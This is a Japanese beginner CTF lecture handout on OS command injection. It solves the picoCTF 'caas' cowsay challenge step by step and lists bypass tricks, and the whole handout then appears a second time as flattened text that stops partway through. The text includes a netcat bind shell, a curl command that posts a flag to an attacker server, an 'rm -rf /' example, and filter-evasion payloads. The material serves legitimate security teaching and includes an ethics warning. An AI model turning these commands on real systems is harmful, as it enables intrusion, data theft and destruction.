2024 CTF講習会 Web編

この講習会について

この講習会では、セキュリティ技術を競うコンテストの総称であるCTFのWeb部門のうち、OSコマンドインジェクションと呼ばれる分野について解説します。
CTFにおけるWeb部門の問題のほとんどは実在のサービスに見立てたWebサービスに対し攻撃を行い、「フラグ」と呼ばれる機密情報に見立てた文字列を奪取することを目的としています。
近年、Webサービスのセキュリティはますます重要になってきています。Webのセキュリティについての知識は、CTFプレイヤーだけでなく全てのWebエンジニアに不可欠な知識と言えるでしょう。
この講習会では、Webにおける攻撃手法の一つであるOSコマンドインジェクションを題材に、Web部門の問題を解く流れを把握することを目標にしています。想定している受講者はCTF初心者です。

CTFにおけるWeb問題の概要

CTFにおけるWeb問題は、フラグの場所によってバックエンド側の問題・フロントエンド側の問題の2つに大別することが出来ます。それぞれについて、典型的なフラグの場所と攻撃手法を見てみましょう。

フラグがサーバー側にある問題

フラグがある場所の例

データベースサーバー
環境変数
アプリケーションサーバーのストレージ
アプリケーションの変数

攻撃手法の例

OSコマンドインジェクション
SQLインジェクション
パストラバーサル
SSTI(Server Side Template Injection)
SSRF(Server Side Request Forgery)
XXE(XML External Entity)

フラグがクライアント側にある問題

フラグがある場所の例

リクエストヘッダー
- ユーザーエージェント文字列
- Cookie
クライアントのローカルストレージ
フォームの入力内容

攻撃手法の例

XSS
- JavaScriptコードのinjectionのこと
- 名前の付いた攻撃類型がたくさんある
  - Reflected XSS
  - Stored XSS
  - DOM XSS
CSS injection
- PRSSI

今回の講習会では、OSコマンドインジェクションを題材に具体的な手法を示すことで、Web分野の攻撃のイメージを持ってもらうことを目標にしています。

倫理

大いなる力には大いなる責任が伴います。
特にWeb部門の知識は、他の部門と比べてもそのまま実社会のサービスに対する攻撃に転用可能なものが多いです。この講習で扱う攻撃手法により攻撃できるWebサービスは地球上にごまんとあります。しかし、当然のことながらこれから扱う攻撃手法を実社会のサービスに対して行うことは犯罪にあたります。
Web部門の知識を学ぶときには、まずこのことを念頭に置いて学習を進めてください。

バグバウンティ制度を設けているサービスも存在しますが、バグバウンティ制度は免罪符にはなりません。制度で許可されている範囲を超える範囲の攻撃はしてはなりませんし、制度の規約の範囲内であっても倫理的にまずい攻撃を行ってはなりません。

OSコマンドインジェクション

OSコマンドインジェクションとは？

「OSコマンドインジェクション」という言葉の意味

OSコマンド: OS(Linux,Windowsなど)のコマンド
インジェクション: 注入(inject+tion)

OSコマンドインジェクション攻撃は、アプリケーションに対するリクエストにOSコマンドを注入(injection)することで、OSコマンドをそのまま実行させ、これによりWebサーバーに対して不正な動作をさせる攻撃です。

OSコマンドとは？

OS(Linux,Windowsなど)に対する指示文です。CUI環境では、基本的にOSコマンドを使用してコンピューターを操作します。
例えばUnix環境では、次のようなOSコマンドが使えます。

cat

複数のファイルの内容を全部連結(concatenate)して表示します。
実は単一ファイルを指定してその内容を表示するだけ、という使い方が最も一般的です。

ls

指定されたディレクトリのファイルの一覧を表示します。
指定しなかった場合は現在自分がいるディレクトリのファイルの一覧を表示します。

lsコマンドのよく使うオプション

オプション	意味
-a	隠しファイルも表示
-l	詳細な情報を表示
-h	-lと同時に指定するとファイルサイズが読みやすい形式になる
-F	ファイルの種別をファイル名のあとにつけて明示する

たとえばls / -alhFを実行するとルートディレクトリ（/）のファイルの一覧が、「隠しファイルを含めて」「詳細情報を含めて」「読みやすいファイルサイズを含めて」「ファイルの種別をファイル名の後につけて」表示されます。

セミコロン

コマンドではないのですが、ここで紹介します。セミコロンはコマンドの区切りを表し、前のコマンドの実行が終了した後に後のコマンドが実行することが出来ます。
例えば、cat a.txt;ls /を実行するとa.txtを表示した後に/のファイル一覧が表示されます。

インジェクションって何？

注入することです。OSコマンドインジェクションは、本来のコマンドに、別のコマンドを注入します。
例えば、指定されたファイルを開くためにコマンドとして「cat の後にユーザーが指定したファイル名を連結したコマンド」を実行するサービスを考えます。例えばユーザーがhoge.txtを指定したらcat hoge.txtを実行するサービスです。

では、ファイル名としてhoge.txt;ls /が指定された場合を考えてみましょう。cat hoge.txt;ls /が実行されます。これは「hoge.txtを表示した後で/以下のファイル一覧を表示する」という意味になります。
ls /だったら大して困らないかもしれませんが、コンピューターの全てのファイルを削除するコマンドrm -rf / --no-preserve-rootが実行されたらどうなってしまうでしょうか？

[TODO]許可を取る

OSコマンドインジェクションの流れ

全てのCTFの問題に共通する流れに沿って、OSコマンドインジェクションの具体的な手法について解説します。

問題を理解する

Web問題の多くの問題は、攻撃対象のサーバーについての情報と同時にファイルが配られる問題が多いです。問題文に直接添付されていなくても、問題ファイルへの自明なアクセス方法が存在したり、自明な攻撃によりエラーが発生すると自身のソースコードを返す問題もあります（問題文がなく、0から推測することを要求する問題も無いわけではないです）。

簡単な問題はよくある攻撃クエリ（;lsや' OR 1=1;--など）で解くことが出来てしまう場合も多いですが、（初心者のうちは特に）闇雲によくあるパターンを試すのではなく、配布ファイルをよく読んで把握してから攻撃するのがオススメです。

ユーザーがリクエストを飛ばしてからレスポンスが返るまでのコードの流れを順番に追っていくのが基本的な読み方です…が、脆弱性がデータを初期化する部分などにあることもあるので、結局全部読むことになりがちです。悲しいですね。

脆弱性を発見する

Web問題は様々な言語で実装されます。Go、Python、Ruby、PHP、Perl、(Node.)js、Java、C#などが多いですが、これらに限定されません。

CTFで扱う分にはなんとなく読めればそれでいい…と思いきや、普通にその言語特有の知識が要求される問題もあります。都度ググったり地道に学んでいくしかありません。Webはそういう分野です。諦めましょう。

OSコマンドインジェクションは、最初から何かしらのコマンドを実行しているところに不正なコードを入れこんで攻撃します。すなわち、そもそもコマンドを実行していない問題に対してOSコマンドインジェクションが効くことはまずありません。OSコマンドインジェクションが出来る、と気付くためには、まずは何らかのコマンドを実行していると気付く必要があるわけです。
各言語における、OSコマンドの実行に用いられる関数はおおよそ次の通りです：

言語	OSコマンドを呼び出すことができる代表的な関数・メソッド
Java	Runtime.getRuntime(…).exec(), ProcessBuilder()
PHP	exec(), system(), passthru(), shell_exec(), pcntl_exec(), popen(), proc_open(), backtick演算子
Ruby	exec(), system(), IO.popen(), backtick演算子,open(), バッククォート
Python	subprocess.call(), os.system()
Node.js	child_process.exec(), child_process.spawn()
Go	exec.Command().Run()
Scala	Process()
Perl	exec(), open(), system(), eval(), qx, バッククォート

特に、PerlやRubyのopen()関数は外部プログラムの呼び出しではなく単なるファイルの読み出しに使われる関数なので注意が必要です。

また、コマンドのインジェクションに使える記号はいくつかあります。UNIX環境で使える記号を一通り紹介します。

記号	意味
`a;b`	aを実行し、bを実行する
`a\|b`	aを実行し、その結果を標準入力としてbを実行する
`a&b`	aをバックグラウンド実行し、同時にbを実行する
`a&&b`	aを実行し、正常終了したらbを実行する
`a\|\|b`	aを実行し、異常終了したらbを実行する
a `b`	bの実行結果をaの引数として与える
`a $(b)`	↑と同じ（bash限定）

脆弱性で出来ることを見つける

何かしらのコマンドを実行している場合、そこにはOSコマンドインジェクションの余地が存在する可能性があります。しかし、ユーザーの入力をそのまま実行するだけ、という問題はほとんどありません。OSコマンドとして不正なコマンドが実行されないようにエスケープがなされていたり、文字数・文字種に制限がある場合もあります。
今何が出来て何が出来ないのかを把握することは非常に重要です。必要ならば、上記の問題を解決する追加の脆弱性を探す必要がある場合もあるでしょう。よくある制約とその回避方法は後ほど説明します。

実際にフラグを得る

上述のようなテクニックを組み合わせ、実際にコマンドが実行できる状態（シェルを奪った状態）になればあとはフラグを取得するだけです。
コマンドが実行出来る状態になった後のあれやこれやは大抵の問題では非本質的です（ここからバイナリの問題が始まることも無いわけではないのですが）。基本的には問題文（大抵は、コード）にフラグの所在は書かれています。
そうでない場合、次のような場所を探してみましょう。

問題ファイル自身
カレントディレクトリ・アプリのディレクトリ
ルート直下
/etc/passwd
/home
/var/log
環境変数（envコマンドで見られる）

それでも見つからなかった場合、findコマンドで検索したり直感に頼ったりする必要がある場合もあります。たまに高度な推測を要求する問題も存在し、このような問題は「Guess問」と呼ばれ非難されています。

findコマンドの使い方

基本的な使い方はfind 検索範囲 -name ファイル名です。
(例:find . -name *flag*)

Permission deniedが無限に出たりするので、2> /dev/nullなどを後ろにつけると良いです。
-nameのかわりに-inameを使うと大文字小文字を区別しなくなります。
-type fを指定するとファイルのみを、-type dを指定するとディレクトリのみを検索します。
-exec コマンド {} +を実行すると見つかった各ファイルに対してファイル名を引数としてコマンドが実行されます。
他にも多くのオプションがあるのですが、長くなるので割愛します。興味がある人は調べてみて下さい。

やってみよう

必要なツール

CTFは大量のツールを使う競技です。僕も環境構築やツールの使い方を覚えることにかなり苦労しました。
が、WebはCTFの中でも比較的扱うツールの少ない分野です。OSコマンドインジェクションに限って言えば、おおよそ次のツールがあれば十分でしょう：

Webブラウザ
テキストエディタ
Postman
Burp Suite
Docker
各言語の実行環境

なお、今回の講習会で扱う問題ではWebブラウザ・テキストエディタ以外のツールは要求しません。

今回扱う問題

今回の講習会では、caasというpicoCTFの問題です。

picoCTFは初心者向けの常設CTFです。

問題を理解する

まずは問題文を読みましょう。

Now presenting cowsay as a service

よく分かりませんね。サイトにアクセスしてみましょう。

Cowsay as a Service
Make a request to the following URL to cowsay your message:
https://caas.mars.picoctf.net/cowsay/{message}

https://caas.mars.picoctf.net/cowsay/{message} にアクセスすればいいらしいです。

 ___________
< {message} >
 -----------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

牛がなんか喋りましたね。これ以上の機能はなさそうです。
どういうサービスかは理解できたので、とりあえずコードを読んでみましょう。

const express = require('express');
const app = express();
const { exec } = require('child_process');

app.use(express.static('public'));

app.get('/cowsay/:message', (req, res) => {
  exec(`/usr/games/cowsay ${req.params.message}`, {timeout: 5000}, (error, stdout) => {
    if (error) return res.status(500).end();
    res.type('txt').send(stdout).end();
  });
});

app.listen(3000, () => {
  console.log('listening');
});

JavaScriptで書かれていますね。

const express = require('express');
const app = express();
const { exec } = require('child_process');

app.use(express.static('public'));

僕はExpressはもちろんNode.jsについても詳しくありませんが、いわゆる「おまじない」が書かれていそうですね。

requireはC++で言うところのinclude、Go・Pythonで言うところのimportです。

const { exec } = require('child_process');だけはちょっと怪しいですね。この資料の上の方でOSコマンドを呼び出すことができる関数として紹介されているchild_process.exec()を実行しようとしているように見えます。

app.get('/cowsay/:message', (req, res) => {
  exec(`/usr/games/cowsay ${req.params.message}`, {timeout: 5000}, (error, stdout) => {
    if (error) return res.status(500).end();
    res.type('txt').send(stdout).end();
  });
});

アプリ本体です。GET /cowsay/:messageのリクエストに対し、execした結果を返しています。
child_process.exec()のドキュメントを読めばこのコードが何をやっているかがわかりますが、わざわざドキュメントを読まなくても

/usr/games/cowsayの引数としてパスパラメータのmessageを与えている
テキストとして結果を返している
5秒でタイムアウトする
エラーが空文字列でなかった場合500エラーが返る
と分かる人は多いと思います。

JavaScriptの文字列は空文字列以外全部Truthy(bool型にするとtrueになる)なので、if (error)は「もしerrorが空文字列でなかったら」という意味になります。

app.listen(3000, () => {
  console.log('listening');
});

これもおまじないに見えます。80番ポートではなく3000番ポートで待機しているのは少し気になりますが、きっとリバースプロキシが挟まれているんでしょう。

脆弱性を発見する

`/usr/games/cowsay ${req.params.message}`にコードをインジェクションすれば良いわけです。

`/usr/games/cowsay ${req.params.message}`は"/usr/games/cowsay " + req.params.messageとだいたい同じ意味です。

/usr/games/cowsayを適当な場所で打ち切って、コマンドを実行したいです。
req.params.messageにうっしっし;任意のコマンドが入っていれば/usr/games/cowsay うっしっし;任意のコマンドが実行されそうです。

脆弱性で出来ることを見つける

5秒でタイムアウトする
エラーが空文字列でなければならない

という制限がついてはいるものの、任意のコマンドが実行できそうです。
試しに https://caas.mars.picoctf.net/cowsay/うっしっし;echo うっしっしにアクセスしてみると、/usr/games/cowsay うっしっし;echo うっしっしが実行されます。

echoは引数をそのまま返すコマンドです。

実際にフラグを得る

問題ファイル自身にフラグは書かれていないので、とりあえずカレントディレクトリを見ます。lsを実行したいので、https://caas.mars.picoctf.net/cowsay/うっしっし;ls にアクセスすると次のような結果が返ってきます。

 __
< うっしっし  >
 --
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
Dockerfile
falg.txt
index.js
node_modules
package.json
public
yarn.lock

falg.txtといういかにもなファイルがあるので、これを開きます。cat falg.txtを実行するために https://caas.mars.picoctf.net/cowsay/うっしっし;cat falg.txt にアクセスするとflagが取れました。

 __
< うっしっし  >
 --
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
picoCTF{moooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0o}

よくある制約とその回避方法

CTFでは攻撃可能な箇所に何らかの制約が付くことは多いです。OSコマンドインジェクションの問題でよく問題になる制約とその対処方法を説明します。

コマンドは実行できるが、その結果が見られない

OSコマンドが実行できる場合でも、つねにその実行結果がユーザーに返されるとは限りません。
このような状況下では、まず第一にインジェクションに成功しているかどうかを判別する必要があります。これは比較的簡単で、sleepコマンドをインジェクションすることで達成できます。（sleep 2は実行に2秒かかるコマンドです）
このような状況下において、実際にフラグを得るために取ることの出来る手段には次のようなものがあります。

バックドアの作成

バックドアは「裏口」という意味です。本来のサービス以外から（不正な）外部通信をするために設置するのでこう呼ばれます。

nc -l -n 1234 -e /bin/shを実行すると1234ポートにtelnetするだけでシェルが使い放題になります。嬉しいですね。任意のポート番号が使える状態でないと使えないテクニックですが、かなり有効です。

ncコマンドについて

ncコマンドはTCP・UDPでネットワーク越しにデータを送受信できるコマンドです（これを使うと人間が使い方を覚えてさえいればHTTPの通信もSMTPの通信も思いのままです）

オプションの意味は以下のとおりです。
-lリッスンモードにする。相手からの通信を待ち受けることができる。
-nIPアドレス・ポート番号の名前解決を行わない。
1234ポート番号を指定する。
-e /bin/sh接続されたあと、/bin/shとやりとりさせる

外部への送信

アプリそのものの出力に頼るのではなく、外部に情報を送信させるのは最も有力な手段の一つです。
例えば、攻撃者のWebサーバにFLAGをPOSTするなどの手法がこれに当たります。（例:cat /flag | curl [url] -X POST -d @-）

time based攻撃

最終手段です。sleepによる遅延を発生させることができる場合、「もしフラグの1文字目がaならばsleep 2を実行」「もしフラグの1文字目がbならばsleep 2を実行」…といったように各文字について総当たりでリクエストを飛ばすことにより、sleepされるかされないかの情報を元にフラグを得ることが出来ます（実際の攻撃では、時間短縮のために良い感じに二分探索するコードを書くことが多いでしょう）。

特殊な記号や文字列を含むコマンドが実行できない

インジェクション可能な場所に何らかのバリデーションやエスケープが効いている場合もあります。CTFの問題にそのような制約がある場合、実は回避可能である場合と、そうでない場合があります。

そうでない場合というのは、そこ以外に何らかの脆弱性があるということです。頑張って他の脆弱性を探しましょう。

他の記号で代用する

セミコロン
複数のコマンドを実行できるのは;に限りません。&とか|とかも使えますし、状況によっては`hoge`とか\nとかも使えます。
空白文字
空白文字もたまに使えないことがあります。${IFS}で代用するのが楽ですが、{cd,..}でcd ..が実行されるテクもよく使われます。

${なんか}はシェルの変数です。${IFS}はシェルにおいて、区切り文字が入っている変数です。

先にバックドアを作ったり、外部から攻撃スクリプトをダウンロードさせたりする

バックドアは上述の通りです。任意のポート番号が使えない場合は外部からwgetコマンドなどで攻撃スクリプトをダウンロードすることを考える必要があります。

エスケープそのものを回避する

エスケープそのものを回避することが出来るパターンもあります。例えば、クライアント側でしか上記のようなバリデーションが実行されていない場合、ブラウザを使わずにPostmanなどで直接アクセスすれば良いです。

ワイルドカード

flagという文字列がブロックされる場合でも、シェルのワイルドカード機能を用いてcat f?ag.txtって指定してもflag.txtが見られます。ファイル名が分からない場合はcat *などと雑に指定してしまうのも手です。

?は任意の1文字に、*は0文字以上に、[abc]はa,b,cのいずれかの文字に、[!0-9]は数字以外の文字にマッチします。

base64でエンコードする

base64にエンコードして送信すると、文字種が限定できます。

長さがN文字以内のコマンドしか実行できない

バックドアの作成のほか、攻撃用スクリプトを攻撃者のWebサーバーからダウンロードさせ、それを実行するなどの手法で回避できます。
ネットワーク接続が制限されている場合、分割して複数のリクエストに分けて送信し、最後にまとめて実行する、などの手法も取れます。

過去のCPCTFでは上記のようなテクニックが一切使えず単純にコードゴルフをすることを要求する問題が出たそうです。怖いですね。

権限が足りない

sudoやcronを確認したり、都合の良い権限で動いているプロセス/動く実行ファイルを探したりしてみましょう。
実はバイナリとの融合問題だった、みたいな場合もあります…

そのほか

出力文字数が制限されている場合や、先にデータベースに攻撃コードを蓄積させておく必要がある場合など様々な制約がつくことがあります。ググりフォースとひらめき力でなんとかしましょう。

演習

https://pearl.ramdos.net/

問題ファイル： https://drive.google.com/drive/folders/1Mfq8kNzR5gIE72-dHDI32D4_ZIFwcknC?usp=sharing

ヒント

perlのopen関数は少し特殊なふるまいをします。perl openなどで検索してみましょう。

演習（おまけ①）

上の演習問題を、バックドアを作ったり、外部に送信したり、あるいはtime basedな攻撃をしたりして、ブラインドの条件下で攻撃してみましょう。

演習（おまけ②：ボツ問題）

https://ctf-escape.trap.show/index.php



<pre><form action="index.php" method="get">
    <input name="key" type="text">
    <input value="検索する" type="submit">
</form>

</pre>

2024 CTF講習会 Web編この講習会についてこの講習会では、セキュリティ技術を競うコンテストの総称であるCTFのWeb部門のうち、OSコマンドインジェクションと呼ばれる分野について解説します。 CTFにおけるWeb部門の問題のほとんどは実在のサービスに見立てたWebサービスに対し攻撃を行い、「フラグ」と呼ばれる機密情報に見立てた文字列を奪取することを目的としています。近年、Webサービスのセキュリティはますます重要になってきています。Webのセキュリティについての知識は、CTFプレイヤーだけでなく全てのWebエンジニアに不可欠な知識と言えるでしょう。この講習会では、Webにおける攻撃手法の一つであるOSコマンドインジェクションを題材に、Web部門の問題を解く流れを把握することを目標にしています。想定している受講者はCTF初心者です。 CTFにおけるWeb問題の概要 CTFにおけるWeb問題は、フラグの場所によってバックエンド側の問題・フロントエンド側の問題の2つに大別することが出来ます。それぞれについて、典型的なフラグの場所と攻撃手法を見てみましょう。フラグがサーバー側にある問題フラグがある場所の例データベースサーバー環境変数アプリケーションサーバーのストレージアプリケーションの変数攻撃手法の例 OSコマンドインジェクション SQLインジェクションパストラバーサル SSTI(Server Side Template Injection) SSRF(Server Side Request Forgery) XXE(XML External Entity) フラグがクライアント側にある問題フラグがある場所の例リクエストヘッダーユーザーエージェント文字列 Cookie クライアントのローカルストレージフォームの入力内容攻撃手法の例 XSS JavaScriptコードのinjectionのこと名前の付いた攻撃類型がたくさんある Reflected XSS Stored XSS DOM XSS CSS injection PRSSI 今回の講習会では、OSコマンドインジェクションを題材に具体的な手法を示すことで、Web分野の攻撃のイメージを持ってもらうことを目標にしています。倫理大いなる力には大いなる責任が伴います。特にWeb部門の知識は、他の部門と比べてもそのまま実社会のサービスに対する攻撃に転用可能なものが多いです。この講習で扱う攻撃手法により攻撃できるWebサービスは地球上にごまんとあります。しかし、当然のことながらこれから扱う攻撃手法を実社会のサービスに対して行うことは犯罪にあたります。 Web部門の知識を学ぶときには、まずこのことを念頭に置いて学習を進めてください。バグバウンティ制度を設けているサービスも存在しますが、バグバウンティ制度は免罪符にはなりません。制度で許可されている範囲を超える範囲の攻撃はしてはなりませんし、制度の規約の範囲内であっても倫理的にまずい攻撃を行ってはなりません。 OSコマンドインジェクション OSコマンドインジェクションとは？「OSコマンドインジェクション」という言葉の意味 OSコマンド: OS(Linux,Windowsなど)のコマンドインジェクション: 注入(inject+tion) OSコマンドインジェクション攻撃は、アプリケーションに対するリクエストにOSコマンドを注入(injection)することで、OSコマンドをそのまま実行させ、これによりWebサーバーに対して不正な動作をさせる攻撃です。 OSコマンドとは？ OS(Linux,Windowsなど)に対する指示文です。CUI環境では、基本的にOSコマンドを使用してコンピューターを操作します。例えばUnix環境では、次のようなOSコマンドが使えます。 cat 複数のファイルの内容を全部連結(concatenate)して表示します。実は単一ファイルを指定してその内容を表示するだけ、という使い方が最も一般的です。 ls 指定されたディレクトリのファイルの一覧を表示します。指定しなかった場合は現在自分がいるディレクトリのファイルの一覧を表示します。 lsコマンドのよく使うオプションオプション意味 -a 隠しファイルも表示 -l 詳細な情報を表示 -h -lと同時に指定するとファイルサイズが読みやすい形式になる -F ファイルの種別をファイル名のあとにつけて明示するたとえばls / -alhFを実行するとルートディレクトリ（/）のファイルの一覧が、「隠しファイルを含めて」「詳細情報を含めて」「読みやすいファイルサイズを含めて」「ファイルの種別をファイル名の後につけて」表示されます。セミコロンコマンドではないのですが、ここで紹介します。セミコロンはコマンドの区切りを表し、前のコマンドの実行が終了した後に後のコマンドが実行することが出来ます。例えば、cat a.txt;ls /を実行するとa.txtを表示した後に/のファイル一覧が表示されます。インジェクションって何？注入することです。OSコマンドインジェクションは、本来のコマンドに、別のコマンドを注入します。例えば、指定されたファイルを開くためにコマンドとして「cat の後にユーザーが指定したファイル名を連結したコマンド」を実行するサービスを考えます。例えばユーザーがhoge.txtを指定したらcat hoge.txtを実行するサービスです。では、ファイル名としてhoge.txt;ls /が指定された場合を考えてみましょう。cat hoge.txt;ls /が実行されます。これは「hoge.txtを表示した後で/以下のファイル一覧を表示する」という意味になります。 ls /だったら大して困らないかもしれませんが、コンピューターの全てのファイルを削除するコマンドrm -rf / --no-preserve-rootが実行されたらどうなってしまうでしょうか？ [TODO]許可を取る OSコマンドインジェクションの流れ全てのCTFの問題に共通する流れに沿って、OSコマンドインジェクションの具体的な手法について解説します。問題を理解する Web問題の多くの問題は、攻撃対象のサーバーについての情報と同時にファイルが配られる問題が多いです。問題文に直接添付されていなくても、問題ファイルへの自明なアクセス方法が存在したり、自明な攻撃によりエラーが発生すると自身のソースコードを返す問題もあります（問題文がなく、0から推測することを要求する問題も無いわけではないです）。簡単な問題はよくある攻撃クエリ（;lsや' OR 1=1;--など）で解くことが出来てしまう場合も多いですが、（初心者のうちは特に）闇雲によくあるパターンを試すのではなく、配布ファイルをよく読んで把握してから攻撃するのがオススメです。ユーザーがリクエストを飛ばしてからレスポンスが返るまでのコードの流れを順番に追っていくのが基本的な読み方です…が、脆弱性がデータを初期化する部分などにあることもあるので、結局全部読むことになりがちです。悲しいですね。脆弱性を発見する Web問題は様々な言語で実装されます。Go、Python、Ruby、PHP、Perl、(Node.)js、Java、C#などが多いですが、これらに限定されません。 CTFで扱う分にはなんとなく読めればそれでいい…と思いきや、普通にその言語特有の知識が要求される問題もあります。都度ググったり地道に学んでいくしかありません。Webはそういう分野です。諦めましょう。 OSコマンドインジェクションは、最初から何かしらのコマンドを実行しているところに不正なコードを入れこんで攻撃します。すなわち、そもそもコマンドを実行していない問題に対してOSコマンドインジェクションが効くことはまずありません。OSコマンドインジェクションが出来る、と気付くためには、まずは何らかのコマンドを実行していると気付く必要があるわけです。各言語における、OSコマンドの実行に用いられる関数はおおよそ次の通りです：言語 OSコマンドを呼び出すことができる代表的な関数・メソッド Java Runtime.getRuntime(…).exec(), ProcessBuilder() PHP exec(), system(), passthru(), shell_exec(), pcntl_exec(), popen(), proc_open(), backtick演算子 Ruby exec(), system(), IO.popen(), backtick演算子,open(), バッククォート Python subprocess.call(), os.system() Node.js child_process.exec(), child_process.spawn() Go exec.Command().Run() Scala Process() Perl exec(), open(), system(), eval(), qx, バッククォート特に、PerlやRubyのopen()関数は外部プログラムの呼び出しではなく単なるファイルの読み出しに使われる関数なので注意が必要です。また、コマンドのインジェクションに使える記号はいくつかあります。UNIX環境で使える記号を一通り紹介します。記号意味 a;b aを実行し、bを実行する a|b aを実行し、その結果を標準入力としてbを実行する a&b aをバックグラウンド実行し、同時にbを実行する a&&b aを実行し、正常終了したらbを実行する a||b aを実行し、異常終了したらbを実行する a `b` bの実行結果をaの引数として与える a $(b) ↑と同じ（bash限定）脆弱性で出来ることを見つける何かしらのコマンドを実行している場合、そこにはOSコマンドインジェクションの余地が存在する可能性があります。しかし、ユーザーの入力をそのまま実行するだけ、という問題はほとんどありません。OSコマンドとして不正なコマンドが実行されないようにエスケープがなされていたり、文字数・文字種に制限がある場合もあります。今何が出来て何が出来ないのかを把握することは非常に重要です。必要ならば、上記の問題を解決する追加の脆弱性を探す必要がある場合もあるでしょう。よくある制約とその回避方法は後ほど説明します。実際にフラグを得る上述のようなテクニックを組み合わせ、実際にコマンドが実行できる状態（シェルを奪った状態）になればあとはフラグを取得するだけです。コマンドが実行出来る状態になった後のあれやこれやは大抵の問題では非本質的です（ここからバイナリの問題が始まることも無いわけではないのですが）。基本的には問題文（大抵は、コード）にフラグの所在は書かれています。そうでない場合、次のような場所を探してみましょう。問題ファイル自身カレントディレクトリ・アプリのディレクトリルート直下 /etc/passwd /home /var/log 環境変数（envコマンドで見られる）それでも見つからなかった場合、findコマンドで検索したり直感に頼ったりする必要がある場合もあります。たまに高度な推測を要求する問題も存在し、このような問題は「Guess問」と呼ばれ非難されています。 findコマンドの使い方基本的な使い方はfind 検索範囲 -name ファイル名です。 (例:find . -name *flag*) Permission deniedが無限に出たりするので、2> /dev/nullなどを後ろにつけると良いです。 -nameのかわりに-inameを使うと大文字小文字を区別しなくなります。 -type fを指定するとファイルのみを、-type dを指定するとディレクトリのみを検索します。 -exec コマンド {} +を実行すると見つかった各ファイルに対してファイル名を引数としてコマンドが実行されます。他にも多くのオプションがあるのですが、長くなるので割愛します。興味がある人は調べてみて下さい。やってみよう必要なツール CTFは大量のツールを使う競技です。僕も環境構築やツールの使い方を覚えることにかなり苦労しました。が、WebはCTFの中でも比較的扱うツールの少ない分野です。OSコマンドインジェクションに限って言えば、おおよそ次のツールがあれば十分でしょう： Webブラウザテキストエディタ Postman Burp Suite Docker 各言語の実行環境なお、今回の講習会で扱う問題ではWebブラウザ・テキストエディタ以外のツールは要求しません。今回扱う問題今回の講習会では、caasというpicoCTFの問題です。 picoCTFは初心者向けの常設CTFです。問題を理解するまずは問題文を読みましょう。 Now presenting cowsay as a service よく分かりませんね。サイトにアクセスしてみましょう。 Cowsay as a Service Make a request to the following URL to cowsay your message: https://caas.mars.picoctf.net/cowsay/{message} https://caas.mars.picoctf.net/cowsay/{message} にアクセスすればいいらしいです。 ___________ < {message} > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || 牛がなんか喋りましたね。これ以上の機能はなさそうです。どういうサービスかは理解できたので、とりあえずコードを読んでみましょう。 const express = require('express'); const app = express(); const { exec } = require('child_process'); app.use(express.static('public')); app.get('/cowsay/:message', (req, res) => { exec(`/usr/games/cowsay ${req.params.message}`, {timeout: 5000}, (error, stdout) => { if (error) return res.status(500).end(); res.type('txt').send(stdout).end(); }); }); app.listen(3000, () => { console.log('listening'); }); JavaScriptで書かれていますね。 const express = require('express'); const app = express(); const { exec } = require('child_process'); app.use(express.static('public')); 僕はExpressはもちろんNode.jsについても詳しくありませんが、いわゆる「おまじない」が書かれていそうですね。 requireはC++で言うところのinclude、Go・Pythonで言うところのimportです。 const { exec } = require('child_process');だけはちょっと怪しいですね。この資料の上の方でOSコマンドを呼び出すことができる関数として紹介されているchild_process.exec()を実行しようとしているように見えます。 app.get('/cowsay/:message', (req, res) => { exec(`/usr/games/cowsay ${req.params.message}`, {timeout: 5000}, (error, stdout) => { if (error) return res.status(500).end(); res.type('txt').send(stdout).end(); }); }); アプリ本体です。GET /cowsay/:messageのリクエストに対し、execした結果を返しています。 child_process.exec()のドキュメントを読めばこのコードが何をやっているかがわかりますが、わざわざドキュメントを読まなくても /usr/games/cowsayの引数としてパスパラメータのmessageを与えているテキストとして結果を返している 5秒でタイムアウトするエラーが空文字列でなかった場合500エラーが返ると分かる人は多いと思います。 JavaScriptの文字列は空文字列以外全部Truthy(bool型にするとtrueになる)なので、if (error)は「もしerrorが空文字列でなかったら」という意味になります。 app.listen(3000, () => { console.log('listening'); }); これもおまじないに見えます。80番ポートではなく3000番ポートで待機しているのは少し気になりますが、きっとリバースプロキシが挟まれているんでしょう。脆弱性を発見する `/usr/games/cowsay ${req.params.message}`にコードをインジェクションすれば良いわけです。 `/usr/games/cowsay ${req.params.message}`は"/usr/games/cowsay " + req.params.messageとだいたい同じ意味です。 /usr/games/cowsayを適当な場所で打ち切って、コマンドを実行したいです。 req.params.messageにうっしっし;任意のコマンドが入っていれば/usr/games/cowsay うっしっし;任意のコマンドが実行されそうです。脆弱性で出来ることを見つける 5秒でタイムアウトするエラーが空文字列でなければならないという制限がついてはいるものの、任意のコマンドが実行できそうです。試しに https://caas.mars.picoctf.net/cowsay/うっしっし;echo うっしっしにアクセスしてみると、/usr/games/cowsay うっしっし;echo うっしっしが実行されます。 echoは引数をそのまま返すコマンドです。実際にフラグを得る問題ファイル自身にフラグは書かれていないので、とりあえずカレントディレクトリを見ます。lsを実行したいので、https://caas.mars.picoctf.net/cowsay/うっしっし;ls にアクセスすると次のような結果が返ってきます。 __ < うっしっし > -- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || Dockerfile falg.txt index.js node_modules package.json public yarn.lock falg.txtといういかにもなファイルがあるので、これを開きます。cat falg.txtを実行するために https://caas.mars.picoctf.net/cowsay/うっしっし;cat falg.txt にアクセスするとflagが取れました。 __ < うっしっし > -- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || picoCTF{moooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0o} よくある制約とその回避方法 CTFでは攻撃可能な箇所に何らかの制約が付くことは多いです。OSコマンドインジェクションの問題でよく問題になる制約とその対処方法を説明します。コマンドは実行できるが、その結果が見られない OSコマンドが実行できる場合でも、つねにその実行結果がユーザーに返されるとは限りません。このような状況下では、まず第一にインジェクションに成功しているかどうかを判別する必要があります。これは比較的簡単で、sleepコマンドをインジェクションすることで達成できます。（sleep 2は実行に2秒かかるコマンドです）このような状況下において、実際にフラグを得るために取ることの出来る手段には次のようなものがあります。バックドアの作成バックドアは「裏口」という意味です。本来のサービス以外から（不正な）外部通信をするために設置するのでこう呼ばれます。 nc -l -n 1234 -e 